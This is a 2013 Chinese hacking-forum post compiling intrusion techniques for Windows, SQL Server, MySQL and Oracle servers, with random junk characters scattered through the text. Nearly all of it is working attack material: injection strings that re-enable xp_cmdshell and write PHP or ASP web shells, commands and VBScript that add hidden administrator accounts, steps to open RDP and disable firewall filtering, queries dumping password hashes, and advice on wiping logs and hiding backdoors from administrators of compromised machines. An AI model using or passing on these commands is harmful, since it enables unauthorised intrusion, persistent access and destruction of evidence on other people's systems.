找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4821|回复: 0
打印 上一主题 下一主题

渗透技术大全

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:24:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

" A' l. q! F5 b1.net user administrator /passwordreq:no" O- d; f; M+ I+ h2 A% Q* h
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了- H3 D) r% w* s9 r- Y9 @" S, k4 f
2.比较巧妙的建克隆号的步骤' Z* }- u, q! G
先建一个user的用户
! D7 {5 M; {0 G% v' s/ x1 {$ \然后导出注册表。然后在计算机管理里删掉
  {% m3 B5 ^* d2 ^, L  @, n在导入,在添加为管理员组% s" ]" F$ E8 d) y: g& C* G
3.查radmin密码
8 Y1 a4 j$ [3 Y, Kreg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg: C3 P1 u% K+ n6 _6 G5 d8 l* b
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]! ~) U; Z2 ~  @  ~6 U
建立一个"services.exe"的项
8 V, A; z7 [. }5 i3 o5 v2 {  a再在其下面建立(字符串值)
& K; X7 O5 Q+ M键值为mu ma的全路径7 Q7 A4 b% B  ~. o* z+ C! ]  U
5.runas /user:guest cmd& w0 s) _) q+ a
测试用户权限!8 n* J; w  Q/ \$ y' s5 Q% J
6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?' c/ Y$ C" _3 s' d& e
7.入侵后漏洞修补、痕迹清理,后门置放:
, X: {# u8 ?6 G) M' {$ F. B$ f9 n基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
' A7 K) V/ x9 g$ t9 U8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c- r8 j1 k- L- o6 r7 `5 P
7 X- ~9 `5 h, Y) g0 P) m0 c, F
for example3 [( u1 }& V# K2 a+ A
3 z& c7 X5 F- @0 h/ @
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
6 i; `5 A) A" G3 V* F; Q
  q' ^8 D0 J3 V! K4 I* tdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
, h; p9 W" u2 W8 U$ r" {
3 g3 s4 O# S0 g/ a8 I9:MSSQL SERVER 2005默认把xpcmdshell 给ON了% W3 @0 w; }, d/ `
如果要启用的话就必须把他加到高级用户模式5 B. B+ V9 l) ~  g% L, B% S2 ]* ?
可以直接在注入点那里直接注入1 o. d8 O2 Z% k. G/ ?2 U4 F# d
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--9 w" `1 T* u% o/ C- d; N
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--% j7 j. b3 v- Y6 i
或者3 ?/ \  [3 s; [' M
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'6 D9 o5 {% }/ A+ ]" Q$ i0 S6 K
来恢复cmdshell。' u, d% ]- |! I. B/ B5 N) [/ O
9 x8 A7 \* {9 ~. J/ A1 Y
分析器
# u, u5 a$ F# `% u1 ^- xEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
$ d( `& L& w1 a然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")- M' e$ x# W( t! X( c" B  C
10.xp_cmdshell新的恢复办法
$ j$ l* {& g2 p8 e3 @1 v2 x# f4 kxp_cmdshell新的恢复办法' b$ H% X) S& L* m0 K) D
扩展储存过程被删除以后可以有很简单的办法恢复:6 m/ I/ d5 V+ t  ]7 |
删除
. O' B% b- j: d6 Udrop procedure sp_addextendedproc$ {  t& b5 {& l3 u4 N# w
drop procedure sp_oacreate/ R# K. U4 X. n4 b( Q9 u, Q8 I  w- |
exec sp_dropextendedproc 'xp_cmdshell'
6 H, W3 F5 x  w8 T4 W" R, H! W& ~+ E
恢复
( {; X+ }; E. d- p3 M7 p) {dbcc addextendedproc ("sp_oacreate","odsole70.dll")* Z! S3 z& Q$ z+ n3 R
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")% ~+ t7 ]3 {. g
* z4 i/ ~  H- B& C1 ~1 D! m4 y9 U
这样可以直接恢复,不用去管sp_addextendedproc是不是存在1 W0 `3 d" N/ K$ ?: \

& B2 d5 v* P4 x, \5 P1 h0 e- h-----------------------------
7 o  W1 ^. R' @" q- N4 l6 P' U( s  r4 c! C& a1 y1 Q3 ?
删除扩展存储过过程xp_cmdshell的语句:/ X# I% }+ P! ]2 Q- |
exec sp_dropextendedproc 'xp_cmdshell'
# \; w3 O! I- U% ^' u3 A2 R* {8 {4 u6 M1 z8 @4 A$ f
恢复cmdshell的sql语句
' s0 [- t. G9 O1 y/ jexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll', S2 Y  |; ~* y! [* B4 r8 {
5 _$ g! \1 W. `2 p
' H0 n( }3 H( U; X$ i
开启cmdshell的sql语句% \% E5 O' Y+ ^6 z, {. d% ]+ V  H

+ g0 i1 A- c- X+ Q# \/ W# Vexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
( M7 N" e" b$ [2 u+ p. p. N2 z& _
判断存储扩展是否存在
* K( [1 x9 X2 R, r/ s; k. P3 N6 Vselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'6 F" ^5 C$ I. O+ \4 ]
返回结果为1就ok) O- Z* l7 z1 v( r  @6 U7 A
0 f2 M# f* b7 I+ s' z
恢复xp_cmdshell
+ f) l3 b& v* H2 D) c$ lexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
; R5 e" q  v/ W( N+ h- i/ ?返回结果为1就ok
6 y( z6 J6 i% b* K$ k  n. }6 s3 k* {3 H2 \. V: Q+ I
否则上传xplog7.0.dll6 V" ?; L, f3 U
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'4 L/ A1 F6 k  }0 Q; L, I2 l

7 w+ d- W! Z* l5 s0 o+ B: r堵上cmdshell的sql语句7 u6 t5 N4 y: Y7 p, l8 R0 G8 k* \; Q
sp_dropextendedproc "xp_cmdshel
# ~/ l2 W  P# Z-------------------------' i) X# M8 T' w: w$ S5 Q# \
清除3389的登录记录用一条系统自带的命令:" p6 \; Z2 H" @/ l0 Z" `: D% x
reg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f
+ e9 u% s) |6 R+ ~/ D: P: p! ^
' V* `/ u$ d( L  P- r' V9 t然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件" Y; N7 j; p- A
在 mysql里查看当前用户的权限- k% v- h* ^, Y$ b+ ^
show grants for  
! \7 @5 `5 }  f# _1 o/ \! d5 d! V" j, N  c6 |( V
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
2 |; L. @$ N2 \5 e8 @7 T' O& i* u0 F

3 s6 e) K1 W% r6 K2 c/ F5 D+ RCreate USER 'itpro'@'%' IDENTIFIED BY '123';
0 }3 t8 U. e! v+ y$ V0 P
7 o  e( Y" J8 p2 F  `: o" W% Q9 dGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
% [- N+ \, C5 W1 I( d8 a6 Y* h1 M
- X4 c- m* t6 v+ y: Z% yMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0+ M$ y' y: W. W) F

  k6 a; d! E3 T: c0 oMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;/ T/ }$ q/ G# B7 @5 k

+ b( J, Q$ E+ t7 _! V3 o' T搞完事记得删除脚印哟。
& p# X4 V. A4 ^. y$ }
# W: ^) k5 A: d! \6 h' @Drop USER 'itpro'@'%';
! M. a. I/ J& i, ]5 k2 g5 S9 h" O- `
Drop DATABASE IF EXISTS `itpro` ;
; w3 i' p3 |" X& v- J' d% S
. C* k" J# J2 c  p" D当前用户获取system权限. Z( H0 [- F4 R& R% I
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
! d; N" J# i* h+ l# c/ t9 O* Q3 ysc start SuperCMD
( W3 w& A/ z: j4 r7 O- K& g' f8 W8 q程序代码. F; h) f& T* X2 a5 }1 @
<SCRIPT LANGUAGE="VBScript">
9 l2 K! `- d8 g( ~8 xset wsnetwork=CreateObject("WSCRIPT.NETWORK")" a0 X& T% A7 ?
os="WinNT://"&wsnetwork.ComputerName
1 [% \9 y7 u# h9 Y5 R& H  tSet ob=GetObject(os)
, _% n( x$ t7 u" qSet oe=GetObject(os&"/Administrators,group")3 M1 _. _4 T- Z4 [8 c/ e
Set od=ob.Create("user","nosec")8 k1 d1 m, J" G7 z
od.SetPassword "123456abc!@#") L/ a# u: O/ A  v
od.SetInfo" c# C  V: B1 T" y
Set of=GetObject(os&"/nosec",user)
6 }# G' }! M9 h5 y1 U3 N8 P' Boe.add os&"/nosec"
( t! N, [/ S6 r5 s</Script>. j, |: b* f6 Q
<script language=javascript>window.close();</script>( @/ s/ J) z3 S
! S2 b; m+ t* P! k" j) I

. w7 u* n; c* Q/ T1 {. E; [, h/ W) b! l) T# e' x0 G7 \2 z

& R1 T0 t1 n& X: S+ X突破验证码限制入后台拿shell
2 c* I/ ^. T9 V* y程序代码
$ f2 h& }2 O1 X$ l1 z0 o8 OREGEDIT4 : @" Y1 j& S+ w
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
) z6 H( i9 y: L"BlockXBM"=dword:00000000% y& }' [( Q4 o2 F, H$ R
8 C% O/ \: w" f! w% q( N, h
保存为code.reg,导入注册表,重器IE
8 S2 S% Z4 W; c1 m1 m就可以了
2 y2 X5 S. X* Punion写马5 _5 _% w; ]( A2 ?* T
程序代码) O. ]2 V  V, K- Z% v
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*# H+ K8 H; K. |. h* F9 R2 Y
$ v8 s/ g9 u8 c9 C6 m7 H
应用在dedecms注射漏洞上,无后台写马
% `7 L( |3 e8 f+ K3 H( j+ Udedecms后台,无文件管理器,没有outfile权限的时候+ R$ y; `/ Q, @9 l; Q
在插件管理-病毒扫描里) W# u# l4 j& B
写一句话进include/config_hand.php里$ w4 @* h+ w: _! {1 Q
程序代码" A/ ?* c7 Z+ V$ I! v
>';?><?php @eval($_POST[cmd]);?>9 I" i, m6 Q8 k! u+ C

: f8 W- E/ }4 E; A+ O; ]- Z% o+ }, j" T0 j& \1 ~
如上格式" W( `. {' }( H& @7 y3 {' v/ o

1 S) m" Y# t! P  b% T4 y7 ~; toracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
/ F# t) w" A& {: h程序代码
% E9 K9 {% u; g# k$ rselect username,password from dba_users;
& j6 S8 D+ W& D+ A5 e- @) m  `" ^
  E+ I3 i5 v/ ]) e& f6 j& v5 c* o  r2 U9 z+ a8 j* T) t
mysql远程连接用户
! h/ n& }/ P( P9 F: D2 p; q程序代码
/ n0 ]6 X% b- i# g2 |
) M+ x6 q7 o4 T+ eCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';( o6 x3 T/ b! i2 D% M/ S* ^
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION/ W; B- T7 I5 w. x5 [, K! h
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 08 z( Q# S8 U% o4 y+ n( A
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
% H8 c' V; s4 x5 ]
$ v' j5 n7 I0 S6 b6 H3 R& l! T
' z, k" f3 H9 I* H- `
& Y) [2 g$ F' `/ Z$ n
7 Y) _% B" v+ ~) Xecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
$ {' B% Q1 O' d- x. S8 M- h9 a7 H) |8 _9 g2 G
1.查询终端端口/ }8 l1 I9 B3 X% j

' m$ h7 L4 `- ?xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber6 k5 o0 w, T3 }% F4 q' R% x$ p
) J; c2 f' s6 h0 l1 Q7 i7 X/ Z
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
% N( {3 H6 h& ]1 Q# u) C8 ~type tsp.reg
% `3 q  f* O* ?( b
5 z  g# `  T, a% @6 c- N2.开启XP&2003终端服务& N4 s$ Q9 C) J* S" H4 o6 L& m
% y+ K$ W2 p: V. u

. Z# E, Y' n; Y6 {* pREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f, Q) {& q0 y# _
1 q) D  k4 Y1 b5 W
6 ^- M7 A0 m, G% j
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f4 M8 Q2 [' M* z5 q' r& _

% ?& {$ M2 E* T" d+ h  j3.更改终端端口为20008(0x4E28)
. Q- @' a2 v  @! r8 t1 T( j# d. `( j/ t2 @
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
  i% L9 h5 r4 e# G$ R" W1 F6 L# ]
( `1 [$ l: m# A; t% E, sREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
# U- i/ U5 g+ t7 ?' K- b; i: `1 @$ K# j1 C6 u
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制! E/ G  G' R3 [( O" o

$ `( n0 l0 {; uREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
; A" Q  i' d6 O$ m  i$ V4 u% u8 L
6 A3 M4 s  S! ~6 q
1 p) q0 b9 w. v5.开启Win2000的终端,端口为3389(需重启)
8 D1 r/ m+ g! L: v% T' w
6 X4 P; p/ }, O  M0 l: Q5 uecho Windows Registry Editor Version 5.00 >2000.reg ( Z8 _1 y5 A# Y+ t2 H/ Y
echo. >>2000.reg
! h" e9 L: f/ n+ t) n0 I9 {echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg 7 I5 _0 @& z" |5 f% B" q' T
echo "Enabled"="0" >>2000.reg 9 _7 Z% {3 }* @3 |  ]) _
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg . D6 ~) X4 \2 h/ }9 F
echo "ShutdownWithoutLogon"="0" >>2000.reg
! \4 ~. L& U9 Y# O% i2 n1 a6 hecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
4 C/ K8 s& t! N1 R! secho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
2 m  i" P& j/ Gecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
: s. {: {  S4 ]+ i$ }6 [) {echo "TSEnabled"=dword:00000001 >>2000.reg
0 ^* W4 z* X3 k1 i( Y5 d7 \9 z( Jecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
, \: k- A9 J$ j: N* Jecho "Start"=dword:00000002 >>2000.reg : k" ]; S: P0 P
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
5 f8 p7 M% n, x' @% L! e. C3 zecho "Start"=dword:00000002 >>2000.reg
3 ~- y9 o% {- qecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg / y1 \% b1 ]4 S% p9 @8 X
echo "Hotkey"="1" >>2000.reg " k% U# ^" m3 \  S# {( o  L! C
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
& D+ S3 V1 p8 g/ P- _echo "ortNumber"=dword:00000D3D >>2000.reg , k& w0 X# s, F% x$ m2 O: q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
) x6 s0 m1 c, o7 y% Mecho "ortNumber"=dword:00000D3D >>2000.reg9 r( T' ?) j' Y, L7 ^0 k
" m# j0 W% b" d- u0 _& }
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
2 E# Z! R' {' {. G$ |* N! K4 ?& W% [- g$ m5 Z6 v& B$ p
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
, |" w, c- U& _(set inf=InstallHinfSection DefaultInstall); Z) P, i1 P- ]! X
echo signature=$chicago$ >> restart.inf# c$ v  ^9 x4 k- e1 e
echo [defaultinstall] >> restart.inf* d8 @2 i) A* f( y
rundll32 setupapi,%inf% 1 %temp%\restart.inf
# |# B8 f8 g; h3 U. C1 ?) d; v  Z2 z
9 x2 {5 `, @: t& P/ d* d' J
7.禁用TCP/IP端口筛选 (需重启)
. \9 v' n$ l) u; N$ A' X1 S# V% F" s! ?5 p" m
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
: s1 C; b, i- {; }3 w+ C
. L, H) Q  |; u2 L8.终端超出最大连接数时可用下面的命令来连接
1 K- q/ h. W; j3 P* Q# y/ @2 n2 M, |$ p, b- t
mstsc /v:ip:3389 /console8 z# l) R& u) J5 ?

% h- i3 ], g2 k, S, b. n2 V9.调整NTFS分区权限: {+ k% v5 L, a8 K& `4 R. ~

" ?* [; E- K6 `" _* X" z. `6 m6 U' scacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)0 Z% i" R  n9 H( |

& y0 \! v0 `; V& Ccacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
8 X: o9 b& M1 u- X% b! I
$ t( G6 `* h, d9 z5 r------------------------------------------------------
$ ~1 [; _# B% {3 D  J$ n7 g3 F9 x3389.vbs # c& v) j. x) P+ u2 Y. C! ?* a
On Error Resume Next2 a/ j, Y  R2 h
const HKEY_LOCAL_MACHINE = &H80000002
% W! W: B# ]% s* L( i/ ~9 W9 HstrComputer = "."0 r9 i8 O5 @( T/ ?" k8 x
Set StdOut = WScript.StdOut+ f$ m; v9 K* @- v/ y
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_5 I# J+ z( _/ E( w, f" e" p; {% ~
strComputer & "\root\default:StdRegProv")& Z0 Y3 }: T0 e) `
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
/ D/ ?. R" Z8 G% g6 foreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
+ Y% i8 P- ?$ a, HstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"7 `7 @1 ~. n* P, p/ v
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
' r; X1 q, D2 d; BstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
8 ^4 x. F/ M! {strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"/ z3 s0 f: E- [. e* p' q& d8 H
strValueName = "fDenyTSConnections"
7 x; N) G# ^1 f. i# j& GdwValue = 0
- h; N2 R* X4 xoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
6 ]: [8 a% X4 ~3 S& Z% hstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
* S+ y* M1 e/ fstrValueName = "ortNumber"
4 B, l, Z7 C* ?, {& h: D% cdwValue = 3389
( k, |9 L, g7 L  [oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue% s* T: e  q! s9 U% }$ E
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
8 ]- h1 j# ~4 M, S5 }( ?. GstrValueName = "ortNumber"
# k5 t; [. ?2 U4 C) OdwValue = 3389: j8 i( {% m1 }5 ~7 w
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
1 ^$ p. p6 g9 ^Set R = CreateObject("WScript.Shell") 9 O6 `! k! N: {9 E
R.run("Shutdown.exe -f -r -t 0") : m$ X3 \( f" a9 X' a9 G* H
. e9 }9 ?2 Z2 z# `, C# t
删除awgina.dll的注册表键值; s3 @2 e  b* y$ ~+ S' `3 _
程序代码5 m% L$ u  g% r& L8 M) V4 K  J

1 E. P! h- [1 |3 Nreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f3 o8 Z! D; ^! o# F
4 V& T2 h' s3 V! F5 O9 F
  j8 e8 e5 F4 q
) _& @  p2 \, I. \

7 b$ P+ |; a5 J8 O" _8 k程序代码
* R2 G$ O6 e  u6 g/ oHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
, Y0 }6 p9 u: z2 r; Y* e4 S
5 t$ h+ c! F) ^1 z' n/ B: e: B  G8 U# y设置为1,关闭LM Hash" F8 X9 r& X- R) }" A

3 A7 b, }" c+ ]2 }7 s. n数据库安全:入侵Oracle数据库常用操作命令5 D5 U/ n& m' b' N1 a
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
2 _: M2 ~, F( ^/ T, s. a/ r1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
' b8 c$ o! u6 o5 R2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
. C" _& t4 A! D" a! u, r3、SQL>connect / as sysdba ;(as sysoper)或
, G! Y8 b( p: I6 Y3 zconnect internal/oracle AS SYSDBA ;(scott/tiger)8 T1 D% ]6 [5 Z# j7 i
conn sys/change_on_install as sysdba;5 d5 l" O* u: ^% e( P2 B8 s3 ^
4、SQL>startup; 启动数据库实例
9 V& z9 x+ H/ O- ]8 b5、查看当前的所有数据库: select * from v$database;
& [; U& n7 n: W8 J& vselect name from v$database;' J0 t! ~$ P! X3 `6 H
6、desc v$databases; 查看数据库结构字段
/ R* H9 _8 @9 h7 t, K' g& D7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:% Z& F0 S6 X7 ]& p6 z
SQL>select * from V_$PWFILE_USERS;" s) L( ]4 W0 D5 _
Show user;查看当前数据库连接用户
) f$ e/ n0 T+ X6 K% q/ q, U8、进入test数据库:database test;
. O& g% ^, {3 g* d. b9、查看所有的数据库实例:select * from v$instance;" |$ k) _- X1 U! }
如:ora9i
) G& _4 Z% P5 I: K10、查看当前库的所有数据表:
8 _: m) K+ a7 d" @/ S% Q% ySQL> select TABLE_NAME from all_tables;" x  o# j* J1 L7 R, |2 F, a& f) X: f
select * from all_tables;# h) R* s- I: f
SQL> select table_name from all_tables where table_name like '%u%';
8 s) g: [* p4 J# ZTABLE_NAME8 z# |0 e+ Q0 a* o7 X8 F; j/ u
------------------------------6 }1 P. p: B3 Y  U1 n8 q
_default_auditing_options_
: C% F% I& \$ i0 ^11、查看表结构:desc all_tables;
0 S8 Q5 [9 h- _+ W7 d12、显示CQI.T_BBS_XUSER的所有字段结构:. n+ E. ^) R  B6 ]! ?  c3 [: Y  b; O* W
desc CQI.T_BBS_XUSER;
; M, w3 g  J; ^0 @5 f13、获得CQI.T_BBS_XUSER表中的记录:4 h, }% X( t8 j1 M: O
select * from CQI.T_BBS_XUSER;
* U7 y/ s* j* ^* y& F( T14、增加数据库用户:(test11/test)
& h  O& v3 {& x* e. l& `. ucreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;: f2 ]; ^1 A8 s, _/ I/ x
15、用户授权:
  C: ^1 O$ R, Z% ]grant connect,resource,dba to test11;) ~& O7 I9 J9 t) e
grant sysdba to test11;: @2 O% t# ]# t$ _
commit;2 z  Z" y; P: e* ^) U
16、更改数据库用户的密码:(将sys与system的密码改为test.)% {7 {, u$ m" x
alter user sys indentified by test;3 ~0 {8 u- \# N9 g4 w
alter user system indentified by test;7 i: E( @: w2 E  z$ U0 T

8 X3 l% C+ b, ^6 @applicationContext-util.xml
- G! x$ L& u3 C3 x2 g* s  C& happlicationContext.xml
, C- t' ]* F5 H$ P/ s* {) e5 F" gstruts-config.xml: {! u8 y1 ^2 D  g+ U9 Q
web.xml
1 y5 J' h1 k. Qserver.xml; `( Y5 ^- K7 z) q  Q
tomcat-users.xml
" w# S' t7 g' s% Bhibernate.cfg.xml" g7 p/ a2 V* c9 Q6 p
database_pool_config.xml
/ {* T( E9 [1 D  Y! w1 ^) U- |/ R- g% ]' E4 I

- A( s& q% |  n1 I8 _* M\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置3 [1 t* h$ J8 K9 x5 u9 _
\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini8 |5 ~6 b, [1 @( I- n4 ^
\WEB-INF\struts-config.xml  文件目录结构
: b* O  \8 r/ F8 M, v! I) s: f9 S& h9 a* k4 x/ r) R5 ?6 g- h
spring.properties 里边包含hibernate.cfg.xml的名称/ ?$ W/ L, q9 A" p
% g5 m  i8 Z0 d7 J
; @4 L, M) c: R# P& X
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml6 @7 y6 ^* x3 m! M

* n  o0 T* y# N3 f8 o: l如果都找不到  那就看看class文件吧。。
& }4 B( W& r3 J8 U9 F& x- x" t, q3 `7 ~/ U
测试1:
( s9 a5 Y8 N3 S- ?* [! F5 r4 _& |! cSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
7 Y) E' }0 n. Q3 C& `9 v# R" z# H: H& B/ x
测试2:! Y5 b# l  k' I  p& [

2 Y" ^( S% C+ a, x9 Bcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
  }5 b7 s7 ]9 a3 P8 u) B- Z  k( ], T# T1 J- h6 G2 p- [
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
5 ~. {; z" P* ?5 ?+ }. D, E3 k4 F7 P7 |- v; N% T- N. N
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
2 I. |6 Y2 X. x; ?8 I
; K, S% j% O* A) |7 C1 a查看虚拟机中的共享文件:
/ j( ]3 O! E9 e  m5 O, w' ~2 j在虚拟机中的cmd中执行
; \6 {4 ^- V. M; a+ G\\.host\Shared Folders  m1 f# |4 H% ~# ?. S7 T) m; J

+ T9 h* d' |1 a8 B/ I* ncmdshell下找终端的技巧
  a/ V6 N- @" o  u( {7 v+ q找终端:
4 n  u2 w2 b0 ^: w第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! * S* x$ }# C! N9 k9 _
   而终端所对应的服务名为:TermService
% Z& X1 {* s8 `8 N, ?! z* X第二步:用netstat -ano命令,列出所有端口对应的PID值!   X, w2 m3 ?( T9 g
   找到PID值所对应的端口
0 ]0 \) j. }/ v( v3 I2 P/ `
; B, i- d/ u) v1 k查询sql server 2005中的密码hash
# F2 H! {8 U  |SELECT password_hash FROM sys.sql_logins where name='sa'9 r) H! A, S( z  ?* O
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a, b5 t9 ?9 e2 s, u
access中导出shell
